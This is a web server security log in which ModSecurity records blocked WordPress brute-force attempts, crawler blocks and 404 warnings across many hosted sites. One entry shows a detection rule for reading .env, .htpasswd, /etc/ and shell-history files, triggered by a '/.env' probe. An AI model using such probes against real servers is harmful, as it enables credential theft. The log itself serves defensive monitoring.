[Tue May 26 18:57:54.202112 2026] [security2:error] [pid 1045635:tid 1045871] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf2RhDcQXYr7SS5sX-3QAAAGo"]
[Tue May 26 18:57:54.699582 2026] [security2:error] [pid 1045635:tid 1045868] [client 51.68.247.201:34316] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.preetishah.com"] [uri "/robots.txt"] [unique_id "ahWf2hhDcQXYr7SS5sX--QAAAGc"]
[Tue May 26 18:57:54.699714 2026] [security2:error] [pid 1045635:tid 1045868] [client 51.68.247.201:34316] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.preetishah.com"] [uri "/robots.txt"] [unique_id "ahWf2hhDcQXYr7SS5sX--QAAAGc"]
[Tue May 26 18:57:54.801003 2026] [security2:error] [pid 1045635:tid 1045677] [remote 213.171.208.62:41482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWf2hhDcQXYr7SS5sX-7gAAACk"]
[Tue May 26 18:57:55.735826 2026] [security2:error] [pid 1045635:tid 1045832] [client 176.65.139.232:53454] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "lmialumni.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWf2xhDcQXYr7SS5sX_HAAAAEM"]
[Tue May 26 18:57:55.767465 2026] [security2:error] [pid 1045635:tid 1045787] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf2xhDcQXYr7SS5sX_EgAAABY"]
[Tue May 26 18:57:56.099726 2026] [security2:error] [pid 1045635:tid 1045853] [client 148.113.128.233:42722] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.preetishah.com"] [uri "/"] [unique_id "ahWf3BhDcQXYr7SS5sX_JAAAAFg"]
[Tue May 26 18:57:56.099856 2026] [security2:error] [pid 1045635:tid 1045853] [client 148.113.128.233:42722] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.preetishah.com"] [uri "/"] [unique_id "ahWf3BhDcQXYr7SS5sX_JAAAAFg"]
[Tue May 26 18:57:56.167331 2026] [security2:error] [pid 1045635:tid 1045696] [remote 123.30.233.13:49476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWf2xhDcQXYr7SS5sX_IwAACTw"]
[Tue May 26 18:57:57.296013 2026] [security2:error] [pid 1045635:tid 1045691] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf3RhDcQXYr7SS5sX_PAAAUzc"]
[Tue May 26 18:57:57.296229 2026] [security2:error] [pid 1045635:tid 1045848] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf3RhDcQXYr7SS5sX_PAAAUzc"]
[Tue May 26 18:57:58.281443 2026] [security2:error] [pid 1045635:tid 1045883] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf3RhDcQXYr7SS5sX_UAAAAHY"]
[Tue May 26 18:57:58.752757 2026] [security2:error] [pid 1045635:tid 1045838] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWf3hhDcQXYr7SS5sX_ZQAAAEk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1218846&moderation-hash=fc4784e8af093403ee41686b1bd3a923
[Tue May 26 18:57:59.425550 2026] [security2:error] [pid 1045635:tid 1045865] [client 202.76.171.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf3hhDcQXYr7SS5sX_dQAAAGQ"]
[Tue May 26 18:57:59.636993 2026] [security2:error] [pid 1045635:tid 1045792] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWf3xhDcQXYr7SS5sX_gQAAABs"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1218846&moderation-hash=fc4784e8af093403ee41686b1bd3a923
[Tue May 26 18:57:59.674670 2026] [security2:error] [pid 1045635:tid 1045698] [remote 123.30.233.13:49476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWf3xhDcQXYr7SS5sX_ggAAID4"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:58:00.071334 2026] [security2:error] [pid 1045635:tid 1045699] [remote 194.163.139.224:40538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWf3xhDcQXYr7SS5sX_iQAAbT8"]
[Tue May 26 18:58:00.398321 2026] [security2:error] [pid 1045635:tid 1045819] [client 66.249.93.131:36754] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahWf3xhDcQXYr7SS5sX_fQAAADY"]
[Tue May 26 18:58:00.403598 2026] [security2:error] [pid 1045635:tid 1045804] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf3xhDcQXYr7SS5sX_jQAAACc"]
[Tue May 26 18:58:00.650840 2026] [security2:error] [pid 1045635:tid 1045718] [remote 194.163.139.224:40538] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWf4BhDcQXYr7SS5sX_mAAAFlI"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:58:02.772681 2026] [security2:error] [pid 1045635:tid 1045708] [remote 176.61.149.56:33284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWf4hhDcQXYr7SS5sX_zAAALEg"]
[Tue May 26 18:58:02.815522 2026] [security2:error] [pid 1045635:tid 1045877] [client 47.128.38.90:18190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "aastha-enterprises.com"] [uri "/robots.txt"] [unique_id "ahWf4hhDcQXYr7SS5sX_1gAAAHA"]
[Tue May 26 18:58:03.318331 2026] [security2:error] [pid 1045635:tid 1045714] [remote 176.61.149.56:33284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWf4xhDcQXYr7SS5sX_3QAAE04"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:58:03.396983 2026] [security2:error] [pid 1045635:tid 1045847] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf4hhDcQXYr7SS5sX_2QAAAFI"]
[Tue May 26 18:58:04.859830 2026] [security2:error] [pid 1045635:tid 1045717] [remote 38.95.35.74:54516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWf5BhDcQXYr7SS5sUAAAAASlE"]
[Tue May 26 18:58:05.086921 2026] [security2:error] [pid 1045635:tid 1045719] [remote 38.95.35.74:54516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWf5RhDcQXYr7SS5sUACgAAL1M"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:58:06.423918 2026] [security2:error] [pid 1045635:tid 1045842] [client 172.224.240.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWf5hhDcQXYr7SS5sUAJgAAAE0"]
[Tue May 26 18:58:06.683147 2026] [security2:error] [pid 1045635:tid 1045725] [remote 46.20.146.46:46096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWf5hhDcQXYr7SS5sUALQAAPFk"]
[Tue May 26 18:58:06.746433 2026] [security2:error] [pid 1045635:tid 1045865] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf5hhDcQXYr7SS5sUALAAAAGQ"]
[Tue May 26 18:58:07.504085 2026] [security2:error] [pid 1045635:tid 1045728] [remote 46.20.146.46:46096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWf5xhDcQXYr7SS5sUARAAAbVw"], referer: https://moes-art.com/wp-login.php
[Tue May 26 18:58:07.798963 2026] [security2:error] [pid 1045635:tid 1045731] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf5xhDcQXYr7SS5sUATgAAI18"]
[Tue May 26 18:58:07.799154 2026] [security2:error] [pid 1045635:tid 1045800] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf5xhDcQXYr7SS5sUATgAAI18"]
[Tue May 26 18:58:07.955150 2026] [security2:error] [pid 1045635:tid 1045844] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf5xhDcQXYr7SS5sUARwAAAE8"]
[Tue May 26 18:58:08.541636 2026] [security2:error] [pid 1045635:tid 1045733] [remote 143.198.203.76:52482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWf6BhDcQXYr7SS5sUAXgAAE2E"]
[Tue May 26 18:58:10.458280 2026] [security2:error] [pid 1045635:tid 1045786] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf6hhDcQXYr7SS5sUAkAAAABU"]
[Tue May 26 18:58:12.712019 2026] [autoindex:error] [pid 1045635:tid 1045885] [client 184.32.111.38:44144] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:58:13.076821 2026] [security2:error] [pid 1045635:tid 1045892] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf7BhDcQXYr7SS5sUA2QAAAH8"]
[Tue May 26 18:58:13.566393 2026] [security2:error] [pid 1045635:tid 1045831] [client 66.249.70.169:61807] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWf7RhDcQXYr7SS5sUA5wAAAEI"]
[Tue May 26 18:58:13.996350 2026] [security2:error] [pid 1045635:tid 1045830] [client 66.249.64.73:65457] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWf7RhDcQXYr7SS5sUA8QAAAEE"]
[Tue May 26 18:58:14.913674 2026] [security2:error] [pid 1045635:tid 1045851] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf7hhDcQXYr7SS5sUA_gAAAFY"]
[Tue May 26 18:58:15.038899 2026] [security2:error] [pid 1045635:tid 1045778] [client 66.249.66.193:35280] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "www.greattusker.com"] [uri "/robots.txt"] [unique_id "ahWf7xhDcQXYr7SS5sUBCwAAAA0"]
[Tue May 26 18:58:17.236831 2026] [security2:error] [pid 1045635:tid 1045807] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf8BhDcQXYr7SS5sUBPgAAACo"]
[Tue May 26 18:58:18.491222 2026] [security2:error] [pid 1045635:tid 1045645] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf8hhDcQXYr7SS5sUBbAAAdAk"]
[Tue May 26 18:58:18.491417 2026] [security2:error] [pid 1045635:tid 1045881] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf8hhDcQXYr7SS5sUBbAAAdAk"]
[Tue May 26 18:58:18.565913 2026] [security2:error] [pid 1045635:tid 1045823] [client 178.20.45.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWf8hhDcQXYr7SS5sUBcgAAADo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1224898&moderation-hash=5bab754b47d74ed2554a03bd03e0a17e
[Tue May 26 18:58:18.757598 2026] [security2:error] [pid 1045635:tid 1045785] [client 173.239.240.58:26477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWf8hhDcQXYr7SS5sUBZwAAABQ"]
[Tue May 26 18:58:18.808502 2026] [security2:error] [pid 1045635:tid 1045843] [client 173.239.240.43:49135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWf8hhDcQXYr7SS5sUBawAAAE4"]
[Tue May 26 18:58:19.426227 2026] [security2:error] [pid 1045635:tid 1045798] [client 178.20.45.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWf8xhDcQXYr7SS5sUBjgAAACE"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1224898&moderation-hash=5bab754b47d74ed2554a03bd03e0a17e
[Tue May 26 18:58:19.432465 2026] [security2:error] [pid 1045635:tid 1045778] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf8xhDcQXYr7SS5sUBgAAAAA0"]
[Tue May 26 18:58:19.743381 2026] [security2:error] [pid 1045635:tid 1045793] [client 173.239.240.36:55817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWf8xhDcQXYr7SS5sUBiAAAABw"]
[Tue May 26 18:58:21.186351 2026] [security2:error] [pid 1045635:tid 1045862] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf9BhDcQXYr7SS5sUBvQAAAGE"]
[Tue May 26 18:58:21.896546 2026] [security2:error] [pid 1045635:tid 1045854] [client 207.174.214.47:17576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "friendsalongtheway.net"] [uri "/wp-cron.php"] [unique_id "ahWf9RhDcQXYr7SS5sUB3QAAAFk"]
[Tue May 26 18:58:23.410976 2026] [security2:error] [pid 1045635:tid 1045835] [client 159.223.87.191:52559] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWf9hhDcQXYr7SS5sUB5gAAAEY"]
[Tue May 26 18:58:23.515738 2026] [security2:error] [pid 1045635:tid 1045851] [client 185.191.171.6:11510] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-12-16/list/"] [unique_id "ahWf9xhDcQXYr7SS5sUCDAAAAFY"]
[Tue May 26 18:58:23.515926 2026] [security2:error] [pid 1045635:tid 1045851] [client 185.191.171.6:11510] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-12-16/list/"] [unique_id "ahWf9xhDcQXYr7SS5sUCDAAAAFY"]
[Tue May 26 18:58:23.683786 2026] [security2:error] [pid 1045635:tid 1045883] [client 15.235.217.63:54331] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWf9xhDcQXYr7SS5sUCCwAAdh0"]
[Tue May 26 18:58:24.416691 2026] [security2:error] [pid 1045635:tid 1045770] [client 159.223.87.191:52608] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCJQAAAAU"]
[Tue May 26 18:58:24.676928 2026] [security2:error] [pid 1045635:tid 1045849] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCHgAAAFQ"]
[Tue May 26 18:58:24.686766 2026] [security2:error] [pid 1045635:tid 1045777] [client 15.235.217.63:54331] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCKQAADCM"]
[Tue May 26 18:58:24.747237 2026] [security2:error] [pid 1045635:tid 1045794] [client 159.223.87.191:52559] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCLQAAAB0"]
[Tue May 26 18:58:24.809257 2026] [security2:error] [pid 1045635:tid 1045675] [remote 213.171.208.62:35572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWf-BhDcQXYr7SS5sUCKwAAdyc"], referer: https://freshmindsolutions.com/wp-login.php
